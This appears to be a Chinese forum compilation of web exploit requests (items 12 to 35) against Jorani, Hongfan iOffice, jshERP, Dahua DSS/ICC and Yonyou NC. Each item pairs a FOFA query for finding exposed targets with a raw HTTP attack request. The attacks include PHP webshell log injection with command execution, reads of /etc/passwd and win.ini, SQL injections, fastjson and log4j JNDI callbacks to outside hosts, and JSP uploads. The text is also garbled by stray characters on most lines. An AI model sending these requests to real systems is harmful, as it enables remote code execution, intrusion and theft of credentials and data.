7 s2 ]3 V" k9 V7 @3 d' Q: c/ W3 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; }. @, |) s+ f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Q; | r, g1 Y2 }( u! ]4 w# Z" oAccept-Encoding: gzip, deflate
6 l4 e, r2 o$ N, cAccept-Language: zh-CN,zh;q=0.9,en;q=0.8, F, g6 ^: v) o8 J* M1 }# W2 o
Connection: close8 k1 I+ ], T7 g! P
" Z$ C* Y# H9 e
- D) M+ z7 ^1 n" W, N5 k12. Jorani < 1.0.2 远程命令执行
# d$ {( M3 K+ s5 dFOFA:title="Jorani"$ m: H% H4 P4 x4 d/ s9 a: C
第一步先拿到cookie
# E: q& x3 e4 @2 c: oGET /session/login HTTP/1.1# z7 H' [1 _4 C. q% `
Host: 192.168.190.305 R6 y- p: A1 _6 t
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
9 L! J# [& c; i( lConnection: close9 J& i/ Z X6 P( k7 i, T* H
Accept-Encoding: gzip
. B! Z7 n5 e9 r& G! Z9 v$ t& Z- N( k5 X! p4 q$ R* i# V
9 _2 a# Q3 Z% c# S! Y) J响应中csrf_cookie_jorani用于后续请求1 ?, C' n. i7 I" H
HTTP/1.1 200 OK% \) J; }% s8 ~/ O
Connection: close
$ F; q2 l& P3 U- F. |# y$ WCache-Control: no-store, no-cache, must-revalidate) M6 h1 d+ F1 ?
Content-Type: text/html; charset=UTF-8
3 B7 [) Z% y! ^& K }' Y& g: pDate: Tue, 24 Oct 2023 09:34:28 GMT
9 T+ x" i; |* B9 X) |) ^Expires: Thu, 19 Nov 1981 08:52:00 GMT
d. e7 j: w8 ]* I$ I4 _Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT. V+ J' C+ c7 r
Pragma: no-cache/ v9 F& W, ]+ t6 O
Server: Apache/2.4.54 (Debian)
( k3 Q) a y3 L8 i4 E7 Y, fSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/ r5 z1 g% F0 Q1 h1 v+ U% `
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
; {8 F; D ? _Vary: Accept-Encoding
4 i2 F6 Y4 E4 y' ?1 Z+ _& B9 e* a) H% k T
+ [$ n! W7 b3 ?POST请求,执行函数并进行base64编码' K& \( A( k5 C5 J$ G8 p* q5 E
POST /session/login HTTP/1.1
! f# ?/ V+ C% \; N- K! JHost: 192.168.190.30
: O4 |( b, a; tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.367 T1 K8 ^" i1 g6 c) Y8 J* X
Connection: close
/ U0 Z/ S6 ]" p( x4 PContent-Length: 252
; q( |" V( ]/ T5 I: Y; iContent-Type: application/x-www-form-urlencoded. M! u- a' ?, U5 W
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
/ q5 D K9 y% f& c6 [Accept-Encoding: gzip: g9 r' ~" {3 o7 z7 W& D, E
0 q; w$ S, F* K" g8 m' m0 R
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
# Y$ M J6 [, B# @
7 q" Z, o6 ]/ X2 B5 O+ m8 O# r C/ ~& U4 {1 O
1 n: z, y9 `2 M; |4 Z
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串; X `$ A, R( m
GET /pages/view/log-2023-10-24 HTTP/1.1* i+ E& H( ?9 T3 e. C9 S6 R! D q
Host: 192.168.190.30
+ f$ L8 I7 R/ H( IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 K7 f. l# e. x- \1 z
Connection: close" G' X8 k& M7 h! v- m1 s) s. G
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
) t1 L5 s3 P5 I+ R. cK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=; K( g& k' ]/ L: E' n+ |
X-REQUESTED-WITH: XMLHttpRequest2 P8 n2 C% d3 g' Y. p
Accept-Encoding: gzip
* V" f" ?$ [- b8 {
( J$ p W3 [" L( {& f2 ?
" u3 C4 C6 i8 Y: {5 \$ l {' o( L, G13. 红帆iOffice ioFileDown任意文件读取
! G% c2 b/ v2 \4 A H3 N1 MFOFA:app="红帆-ioffice"6 S0 [: Y& `* v9 [- o/ }
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
# Z: m1 k- Y5 G, G EHost: x.x.x.x. O K& f2 z9 o) [; q R1 I
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ `& |" ? l) ^3 f$ E+ h, s
Connection: close H+ w( Z' a* I
Accept: */*
, y" A* i7 J0 u+ l6 AAccept-Encoding: gzip
* h$ ]2 e/ O. b4 H% C6 R: R7 B4 G
+ t% [& L. C2 N: ]
* T+ }3 U2 s2 {, E14. 华夏ERP(jshERP)敏感信息泄露. s4 b z3 |/ i. n0 R: A
FOFA:body="jshERP-boot"" w9 L8 n8 ^' H
泄露内容包括用户名密码5 H! K0 h/ |8 |/ {8 W6 u
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1 m5 h# {) |5 P$ \
Host: x.x.x.x8 A$ ^" Y+ z7 [' s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
5 Q7 |! s$ z: A$ u6 Q3 d+ [0 MConnection: close8 u) { J. `2 d( r
Accept: */*7 B+ q* B: X6 B3 F
Accept-Language: en7 }1 F( q* ~# m8 N6 B$ I
Accept-Encoding: gzip; k ?4 N9 R, M3 a+ C/ @& m
3 T4 \. B3 `0 Z5 M+ n& E' t- o
0 h+ L8 c; Y; i, `6 Q- [3 o15. 华夏ERP getAllList信息泄露3 t: N. Y# j* a E0 ~+ _' k
CVE-2024-0490
: V3 F+ t% w# K1 Q3 |FOFA:body="jshERP-boot"
' o* O* i" i1 T泄露内容包括用户名密码
" ]* B( d. j- V4 M- H2 lGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.19 c; U4 `% `* D1 j
Host: 192.168.40.130:100, F6 f2 F+ D* v' [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36( S7 H" o! X6 J W3 I. b4 p5 g
Connection: close- v6 N# q: J1 A3 r
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8% d! L/ n. {# n0 {! J9 o# h! j
Accept-Language: en
3 s, S. z9 E k( `$ v% c7 r, ssec-ch-ua-platform: Windows# y. c2 C* g. c
Accept-Encoding: gzip
( q( i3 z- i# ^6 d% Q7 U; m& D. K: X0 E4 ]
4 @2 B& Q" \& q: W$ R0 T4 K) o L; h16. 红帆HFOffice医微云SQL注入 B4 C& b3 x! B, i4 W
FOFA:title="HFOffice"
7 N* _+ A8 ?& |2 bpoc中调用函数计算1234的md5值
. @+ i; ^/ S5 R* u" n* XGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
6 G2 j2 l1 p( f AHost: x.x.x.x
) ?2 C' G+ I! v; F2 oUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36. T9 Y, a) @$ t2 ~; [) y
Connection: close
9 t$ G" D) g& ?5 c1 }8 ^Accept: */*
/ G) w( S% L; [4 nAccept-Language: en+ `; B0 x5 E1 Q& x) ]
Accept-Encoding: gzip
9 {2 }6 I2 A o5 M- k3 ^2 m3 S. r" D# _ s) o0 C/ m- f% X, ~ Y& x
7 K+ c9 C% r7 W3 D( a9 i* K' D7 j" Q17. 大华 DSS itcBulletin SQL 注入
# L8 S3 F) L/ h* G- TFOFA:app="dahua-DSS"; w0 L$ C+ G! ]% J" n/ F
POST /portal/services/itcBulletin?wsdl HTTP/1.13 y! Y2 S! P" H1 I: e
Host: x.x.x.x" D5 ~* q) S6 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 t# `2 a/ R1 I% w( R
Connection: close
8 P0 ~8 m! u6 g' Q2 z% U7 B, bContent-Length: 345
, J$ l; K q% yAccept-Encoding: gzip
; f" K) a' \. B7 O; h) D) k" X ]& z3 i# m+ u
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>: G8 f7 W# B2 m8 K' I
<s11:Body>
, O) m% W4 N8 }* x <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>5 z6 n2 Q; ^9 |9 W6 W! h0 I4 c
<netMarkings>7 b. F# _, J6 u7 D, q
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=16 p9 N+ U# j7 b+ i$ X- W8 H9 z: Y0 p6 B
</netMarkings>" C4 h8 X1 W/ x2 w" n$ E, ?* \
</ns1:deleteBulletin>
! O' w! A% c% L) X# ^& [ k0 f </s11:Body>0 U( b) J0 G+ r \
</s11:Envelope>
+ @: v2 ~9 ?8 G! }
+ m; T- }; M9 h( _1 g
& k- ]7 Z3 n! }18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
" ^# S5 ^2 S" L% W' N* tFOFA:app="dahua-DSS"
B* E5 ^4 s% u2 K, BGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1% b( ]$ A" r" |
Host: your-ip6 ?4 v9 @8 I/ Q' N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, e/ U. D. {# u, u: {$ G4 ?
Accept-Encoding: gzip, deflate1 [0 z" f& [& A. e V
Accept: */*
/ q/ }, ?, g6 g2 A2 I8 X: xConnection: keep-alive o0 n* S3 m# j: T$ u! T
0 L( R. L* U/ ` Q- B- p* N: l
. q; O# G9 ~' m8 v+ x; S
3 n3 O; I/ v* w3 L19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
' ?" a0 N/ p/ zFOFA:app="dahua-DSS"
" Y* G( A( D% r" ?# i$ vGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1- }7 a2 Y1 E! E3 q
Host:
: V4 C& R4 J; k5 B$ oUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
2 o$ E. ^. a# l+ w4 y1 z1 ZAccept-Encoding: gzip, deflate4 E' L: N! n% j- I9 L4 x
Accept: */*
) c' p8 ?( h5 D8 o; W D5 J2 ?* lConnection: keep-alive
" t8 {2 s9 ]5 M$ J6 h! i: e- V4 M
$ m. L5 n; o" D# M( p20. 大华ICC智能物联综合管理平台任意文件读取
/ D7 R! J0 {! f, h+ x( v C; `FOFA:body="*客户端会小于800*"
7 @% q6 T7 [7 {; CGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
2 a2 K. |, `6 q& c/ z6 i) uHost: x.x.x.x" W" m/ m( [! j5 V* M
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# P* G3 B3 ]1 j+ G3 E: Z" A
Connection: close
+ O' y: P9 M& D8 `( zAccept: */*
3 {, T& X2 [0 z& QAccept-Language: en! m: t* K; b! M& R: l
Accept-Encoding: gzip
! _8 W/ O8 C: G( P+ Y$ Y' t6 s O( X1 _7 M
; v& h* ]% ?0 o3 q$ }. l& w
21. 大华ICC智能物联综合管理平台random远程代码执行; M; e4 Y5 l1 D3 k) y6 h
FOFA:icon_hash="-1935899595": W1 B! T8 h6 i1 y
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.16 [5 A) L: M! R- ^/ E7 I- Y
Host: x.x.x.x
# g& X" L" V+ w- E9 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 |$ D! X+ b+ O
Content-Length: 161
& ]1 ^6 G' U3 q1 h+ e: L' t0 GAccept-Encoding: gzip
7 ]! k4 G: \) WConnection: close8 b/ M; q/ ?6 j. J1 o* p
Content-Type: application/json;charset=utf-8
/ w: |% H* G# y: u& ^% C# [
% x! @: m/ M L8 R5 i7 h{
0 [: ^3 u: u4 ]0 M8 z' E( H"a":{' S& _6 V4 O% x( k
"@type":"com.alibaba.fastjson.JSONObject",: B% T- V9 p! M! w4 _3 J5 s3 h
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}% S# f/ Q5 V: }3 |1 k1 K8 X( E6 h5 K
}""" Y A5 s: X' W; g7 I& A
}
# n) F+ Y' u( o9 {
7 M. s% J3 ^- i5 Y8 J
j3 W4 z' V0 v* U7 ^$ G( z22. 大华ICC智能物联综合管理平台 log4j远程代码执行6 s" S& \6 a% y6 n
FOFA:icon_hash="-1935899595"6 p" k% D/ Y" K( ]5 H
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1$ ^8 G* ?' \6 D# J5 e
Host: your-ip- Q" L2 O' C/ w) j' r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; Q9 X. Z& h: \0 w9 F* V
Content-Type: application/json;charset=utf-8
" w* V( _" L9 G7 [& h$ c. z; p p/ w1 D
{
% A+ r$ X$ n9 u' B" ^" Y"loginName":"${jndi:ldap://dnslog}"7 y4 c+ D# c4 Z1 F4 {0 ~
}
# d: O }7 g$ O; U a Q
2 U! o5 p2 Q) @4 H3 K9 [) j' Q
5 e. i4 C8 T" C% L8 M4 Z( N$ K% v/ \4 k9 p" c; F) A, Z( w& @3 K
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行- P# ~, @( U q* c3 t
FOFA:icon_hash="-1935899595"9 T- \8 Y1 v# j" T
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
- d: q6 w$ C2 n# T% tHost: your-ip
R; `$ _( L) i3 |# x: B' o* x9 m% R5 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 ^4 f9 A1 D( d" i' h4 w9 P
Content-Type: application/json;charset=utf-8
# ?0 t9 o8 S( G, Z1 ?# wAccept-Encoding: gzip0 Z" d5 K8 Z v5 G. j% ]0 x5 W
Connection: close
6 Y' J. G( b) V# N
0 `! n9 M/ q& w{
' ~7 c1 p- T; B8 `% i$ z3 X1 J "a":{
! R/ m2 i$ Y+ q "@type":"com.alibaba.fastjson.JSONObject",
( M+ P* v0 K! d% |6 M' F' H {"@type":"java.net.URL","val":"http://DNSLOG"}9 r% \- @- U4 Y( l- f3 x
}""
% U* b% P7 s6 G6 Z6 e& t4 O}: u/ y. I+ g- `* H2 E4 B- I
& m9 s5 u+ o# {5 ?+ p7 G
5 n1 u. k+ v$ t& D24. 用友NC 6.5 accept.jsp任意文件上传3 |& n+ M* {4 S e$ b
FOFA:icon_hash="1085941792"1 J! q/ K v b/ ~2 d
POST /aim/equipmap/accept.jsp HTTP/1.1
/ j3 w# E0 R& ~Host: x.x.x.x
" Z% O2 {8 y& v: h; t) V4 ZUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
* O' B0 @+ r' S% Y9 `: QConnection: close
" v! P x I W# y# DContent-Length: 449
0 R% u8 U$ K/ B4 S# ~3 T+ M" FAccept: */*/ ~; |4 ^4 X6 r- ? l8 _
Accept-Encoding: gzip$ ]0 I9 u7 l1 }. G3 s; K/ z# s
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc8 T3 p' o$ D. \! {8 J
5 D7 C/ f W( G2 |( d, I-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc6 J9 x& H9 g+ `5 v
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
( u0 ?6 y. r' r; zContent-Type: text/plain! B/ y& X; E$ |
- t+ Q6 U! X& v8 }, R- D: x
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %> J Z' k# c, p( Q5 t, |% s
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
' q$ Q9 a, h! m$ \# I' bContent-Disposition: form-data; name="fname"
0 Q/ r" o2 C( m3 j
$ D* f+ U3 M n! H6 C\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp( v. J% _1 q; Q; I: A5 {# s
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
, C) O. R% c. J% K! S% O+ A% J9 ]+ z( X) y- y! P
4 O4 _% ~5 J& v- |7 ]! [25. 用友NC registerServlet JNDI 远程代码执行2 S1 _0 _( m/ Z; p5 b5 b
FOFA:app="用友-UFIDA-NC", Z ]% C: a" _ c, ]
POST /portal/registerServlet HTTP/1.1( {! y2 v( i9 @3 D9 Q7 d: Q% P
Host: your-ip
: l" u. _6 S6 C9 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
7 G# N- K4 A& W6 M6 ]4 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9# Q: Q- k9 Y# A6 E" L/ i) ~* Y+ X
Accept-Encoding: gzip, deflate" r) P! P% C8 n/ ^, C* S- i
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
8 t4 E6 d" ]& pContent-Type: application/x-www-form-urlencoded5 m. a% z) S' ?0 m# _3 S. ~
, E8 p9 L* s* e4 s. @( M
type=1&dsname=ldap://dnslog
& B& |1 p0 u" j% [' V
: v/ Q/ X! P0 l; G" s, H' Q3 S9 v1 M( W1 X6 g1 j
% @( C3 }7 P4 f4 X) v2 o) F# s
26. 用友NC linkVoucher SQL注入. P! u' `9 S3 M
FOFA:app="用友-UFIDA-NC"
4 f; d: Z6 V1 }- lGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.11 {- ^& g* x- O! w" v! Q' E1 W! E
Host: your-ip
! U0 z9 p; \" f( i' v# p+ z" VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% j5 d' e7 s% v$ g7 q; D9 A1 y' C
Content-Type: application/x-www-form-urlencoded1 g% `' a9 }1 y: Y9 e5 L7 O- ~
Accept-Encoding: gzip, deflate) W# Z, h( C) S
Accept: */*( U% D4 }: S: g( w3 g2 y, j% l) a6 v- ]
Connection: keep-alive
3 t4 K# d9 z0 ~- W$ j4 h
- N# G8 W' {( o% g3 w4 [* e* x+ N" I* |. q. e
27. 用友 NC showcontent SQL注入3 O; B) H2 g& N4 U2 h! i8 D
FOFA:icon_hash="1085941792") h/ N" @2 U% p6 X; O& v
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1% O) C g" K4 n1 |* z
Host: your-ip/ T$ R( _& ] V3 A; y3 [. S* T% J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 W+ v- ]" l& e8 N9 z- t8 a
Accept-Encoding: identity
4 c( ^! m( ^5 R K" {) N% z* pConnection: close
% b9 K% y6 F+ Q5 w. vContent-Type: text/xml; charset=utf-8# X" ]% Y7 _3 ~
$ b) w& q1 E- _* i) H0 d1 A
0 H6 w1 d: G. t28. 用友NC grouptemplet 任意文件上传: a/ I# e5 i* ~7 m# U
FOFA:icon_hash="1085941792"! T9 M: `) P8 _( _
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1% B1 w' U, e5 S' w0 n
Host: x.x.x.x
, p% C( X% O4 U9 Y" O) ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
3 ?$ z0 }% k' k" L" @7 VConnection: close
P/ x% t+ r; M4 ~5 k& S4 rContent-Length: 2680 R) s0 K/ ~7 H& s$ Y4 J
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
& ?( C* j6 ^) P3 B4 h2 nAccept-Encoding: gzip
F& X" M9 y8 t& u' V
" H1 f7 I5 z1 O9 j$ I* a' u------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk$ d6 Q9 ~9 x9 h) z
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"1 ]* w' \" [0 P+ {
Content-Type: application/octet-stream
7 @. f# ^; H2 _9 l( ~( [& ^5 j) E% d: d
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>/ Z7 H8 m2 C( H( Z3 [2 L
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
- \+ O# l V6 m; v9 m& U2 n. e' d) F+ |
; ]" Q0 G, r( ?
/uapim/static/pages/nc/head.jsp
- T) d/ j( C$ j6 t5 M. \/ U/ b( l; Q: D2 B7 H) X
29. 用友NC down/bill SQL注入; ]6 f) z* I2 A& L. e6 ~
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"% I; @& g5 x+ |& L
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
" v" `# F3 r4 W. rHost: your-ip/ E4 O3 U% y& l- M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" P4 e7 N, ^. i/ @7 ?$ D1 L, W1 J& W
Content-Type: application/x-www-form-urlencoded
2 D- v6 `+ }/ l! MAccept-Encoding: gzip, deflate7 C; l5 T2 o1 |) \ C, z1 R( I. j/ K
Accept: */*) }- y* Y: l4 R$ V' y/ N: a- s' n
Connection: keep-alive
y1 @! w0 k" I/ A# \$ ^* h4 i8 h6 H- e# a& w" `4 o K
9 v3 ~2 U5 v) H6 c3 W+ y
30. 用友NC importPml SQL注入
# l3 r. [' d- [# p+ e- vFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"/ G$ z4 N( d1 T
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
- P9 W3 a" ^" mHost: your-ip
1 g" H2 c+ l* ~6 G' d1 ]6 z0 sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
9 v2 d8 b4 y6 c7 r7 K4 r& K: WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
3 X& S2 B9 Z. |2 [Connection: close
l- @: W5 l+ Q3 d( ?' {' w7 n$ ^7 b7 \* h/ Z, q! w% M$ k j
------WebKitFormBoundaryH970hbttBhoCyj9V0 j- s6 @9 I- I
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"/ N8 m; j: h" }2 R2 a9 m0 g0 w! F
Content-Type: image/jpeg( t, D; y9 v: k) i8 |" ~. k8 q2 G3 L; z
------WebKitFormBoundaryH970hbttBhoCyj9V--2 a B% ?" L6 a9 d) x& r5 b% X
# Z3 m+ M$ D" h. b
$ ]0 g" D ^5 q
31. 用友NC runStateServlet SQL注入
$ [7 ?5 I7 w4 b9 x. F! L( L* Cversion<=6.5
( n; ?* S% |. H8 ^FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% {+ c, ~4 j# x0 c% `GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1" x' V0 i1 C8 O5 [" X1 I( y) y) h4 D: A
Host: host) k* {7 H' _, S, R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% Q( `% H* k) o) r2 w3 `Content-Type: application/x-www-form-urlencoded2 W8 {7 W6 _) f: e' ], F, [8 w! F/ I
4 g/ ]3 P8 K- i" j% I! k6 i9 _
$ { ?2 A3 F! T( z" i# U6 l
32. 用友NC complainbilldetail SQL注入
/ m3 N r2 L$ [0 sversion= NC633、NC65) `0 x% o; V, p! A- G
FOFA:app="用友-UFIDA-NC"& e, e* F1 z3 u. k! V
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
* r) S3 O$ z5 R, \Host: your-ip
$ d- H4 d2 [8 j9 M7 b7 |5 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: a3 O% q j3 \, M2 a$ J# ]9 {Content-Type: application/x-www-form-urlencoded
* a: \6 h+ R( g7 O' A! [) F1 sAccept-Encoding: gzip, deflate
4 c5 }' P! k8 z, y m0 DAccept: */*8 u! H) ]. L5 i3 d
Connection: keep-alive/ _' C' ^* Q' S0 S* z/ q' q
9 E4 T7 \+ X) S0 y7 D
& k; P* y* O3 ]$ G1 ]3 A& U33. 用友NC downTax/download SQL注入: o8 w0 x$ {# S) ~& i" p* ~
version:NC6.5FOFA:app="用友-UFIDA-NC"7 X D" z2 y7 }- t @
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% F+ v. {% u2 @! ^Host: your-ip
( R% p3 o6 E$ P8 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 R e6 [& l2 s$ }
Content-Type: application/x-www-form-urlencoded
8 U1 _$ {1 l2 a# [Accept-Encoding: gzip, deflate, ?8 G. p0 E# H* M, B
Accept: */*3 M8 P) b7 U# n/ K ^2 X
Connection: keep-alive! R8 m$ j( L3 V8 m: N- F& V
8 j- C+ P9 ?( X: j2 {; j- R8 d) c, n3 D3 l
34. 用友NC warningDetailInfo接口SQL注入7 F) c6 y4 c* i+ A3 N
FOFA:app="用友-UFIDA-NC"/ t8 R1 I5 v& |7 b9 j
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1. z; z2 w/ p6 d; T! k0 H
Host: your-ip
& N( }9 J8 w5 X" t5 W! o: nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 Q+ v/ v% @; L+ ^5 V. M6 ~Content-Type: application/x-www-form-urlencoded
' a' G. _8 `! G1 A& E. O# S: aAccept-Encoding: gzip, deflate' E$ T1 D0 x0 u0 u
Accept: */*
8 p: x1 n' V5 w- n9 B- w8 pConnection: keep-alive2 u" l& l. m1 X- W! z2 A
. [) ^8 U& W* Y9 k# ~1 P/ D6 B
6 h$ m0 C4 a: o$ R5 h35. 用友NC-Cloud importhttpscer任意文件上传
2 T; _/ s4 n# x0 B! ?& B# NFOFA:app="用友-NC-Cloud"
$ E }( H' G4 d% [ V6 pPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
& p, y3 h: C% T; ?9 Q2 N `4 ~* xHost: 203.25.218.166:8888
9 L2 z9 A( O) \) u) @! a" k! i# BUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
% f6 r2 a+ l3 _: A" Y( @5 ?6 U. [Accept-Encoding: gzip, deflate
